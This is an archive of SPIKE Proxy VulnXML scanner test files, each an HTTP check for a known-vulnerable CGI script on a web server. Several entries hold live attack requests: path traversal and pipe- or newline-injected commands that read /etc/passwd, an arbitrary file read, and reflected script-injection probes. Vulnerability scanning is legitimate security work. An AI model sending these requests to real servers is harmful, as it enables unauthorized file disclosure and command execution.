spkproxy/VulnXML/DirectoryTests/directorytest-8.xml0100664000076500007650000000704507566204543021522 0ustar davedave (printers/) "Printers directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}printers/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-900.xml0100664000076500007650000000733407566204543021664 0ustar davedave (betsie/parserl.pl/<script>alert('Vulnerable')</script>;) GET 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}betsie/parserl.pl/<script>alert('Vulnerable')</script>; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/DirectoryTests/directorytest-901.xml0100664000076500007650000000731007566204543021657 0ustar davedave (bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=) "This CGI allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-902.xml0100664000076500007650000000720707566204543021665 0ustar davedave (bizdb1-search.cgi) "This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bizdb1-search.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-903.xml0100664000076500007650000000704207566204543021663 0ustar davedave (bnbform) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bnbform HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-904.xml0100664000076500007650000000705207566204543021665 0ustar davedave (bnbform.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bnbform.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-905.xml0100664000076500007650000000747207566204543021674 0ustar davedave (book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10) "This CGI allows attackers to read arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-906.xml0100664000076500007650000000723507566204543021672 0ustar davedave (boozt/admin/index.cgi?section=5&input=1) "Boozt CGI may have a buffer overflow. Upgrade to a version new than 0.9.8alpha." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}boozt/admin/index.cgi?section=5&input=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-907.xml0100664000076500007650000000712407566204543021670 0ustar davedave (bsguest.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bsguest.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-908.xml0100664000076500007650000000712207566204543021667 0ustar davedave (bslist.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bslist.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-909.xml0100664000076500007650000000713007566204543021667 0ustar davedave (bulk/bulk.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bulk/bulk.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-910.xml0100664000076500007650000000722007566204543021657 0ustar davedave (c32web.exe/ChangeAdminPassword) "This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}c32web.exe/ChangeAdminPassword HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-911.xml0100664000076500007650000000713407566204543021664 0ustar davedave (cached_feed.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cached_feed.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-912.xml0100664000076500007650000000711507566204543021664 0ustar davedave (cachemgr.cgi) "Manager for squid proxy; problem with RedHat 6 making it public 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cachemgr.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-913.xml0100664000076500007650000000725407566204543021671 0ustar davedave (calendar/calendar_admin.pl?config=|cat%20/etc/passwd|) "This CGI allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}calendar/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-914.xml0100664000076500007650000000716607566204543021674 0ustar davedave (calendar/index.cgi) "Mike's Calendar CGI contained a bug which allowed arbitrary command exectution (version 1.4) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}calendar/index.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-915.xml0100664000076500007650000000723207566204543021667 0ustar davedave (calendar_admin.pl?config=|cat%20/etc/passwd|) "This CGI allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-916.xml0100664000076500007650000000714007566204543021666 0ustar davedave (calender_admin.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}calender_admin.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-917.xml0100664000076500007650000000726607566204543021700 0ustar davedave (cal_make.pl?p0=../../../../../../../../../../etc/passwd%00) "This CGI allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-918.xml0100664000076500007650000000720007566204543021665 0ustar davedave (campas?%0acat%0a/etc/passwd%0a) "This CGI allows attackers to read arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}campas?%0acat%0a/etc/passwd%0a HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-919.xml0100664000076500007650000000704207566204543021672 0ustar davedave (cart.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cart.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-920.xml0100664000076500007650000000705707566204543021670 0ustar davedave (cart32.exe) "request cart32.exe/cart32clientlist" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cart32.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-921.xml0100664000076500007650000000713407566204543021665 0ustar davedave (cartmanager.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cartmanager.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-922.xml0100664000076500007650000000713407566204543021666 0ustar davedave (cbmc/forums.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cbmc/forums.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-923.xml0100664000076500007650000000710207566204543021662 0ustar davedave (cgi-lib.pl) "CGI Library. If retrieved check to see if it is outdated 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cgi-lib.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-924.xml0100664000076500007650000000742707566204543021675 0ustar davedave (cgicso?query=<script>alert('Vulnerable')</script>) "This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-925.xml0100664000076500007650000000723307566204543021671 0ustar davedave (cgicso?query=AAA) "This CGI allows attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cgicso?query=AAA HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 400 Required field missing\: fingerhost 200 400 Required field missing\: fingerhost 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-926.xml0100664000076500007650000000731007566204543021666 0ustar davedave (cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00) "This CGI allows attackers to read arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-927.xml0100664000076500007650000000705207566204543021672 0ustar davedave (cgimail.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cgimail.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-928.xml0100664000076500007650000000711207566204543021670 0ustar davedave (cgiwrap) "Some versions of cgiwrap allow anyone to execute commands remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cgiwrap HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-929.xml0100664000076500007650000000715407566204543021677 0ustar davedave (change-your-password.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}change-your-password.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-930.xml0100664000076500007650000000721107566204543021661 0ustar davedave (class/mysql.class) "Basilix allows its configuration files to be downloaded 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}class/mysql.class HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ This program is free software 200 This program is free software 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-931.xml0100664000076500007650000000706307566204543021667 0ustar davedave (classified.cgi) "Check Phrack 55 for info by RFP" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}classified.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-932.xml0100664000076500007650000000705207566204543021666 0ustar davedave (classifieds) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}classifieds HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-933.xml0100664000076500007650000000706207566204543021670 0ustar davedave (classifieds.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}classifieds.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-934.xml0100664000076500007650000000721307566204543021667 0ustar davedave (classifieds/classifieds.cgi) "Mike's Classifieds CGI contained a bug which allowed arbitrary command exectution (version 1.2) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}classifieds/classifieds.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-935.xml0100664000076500007650000000710207566204543021665 0ustar davedave (clickcount.pl?view=test) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}clickcount.pl?view=test HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot 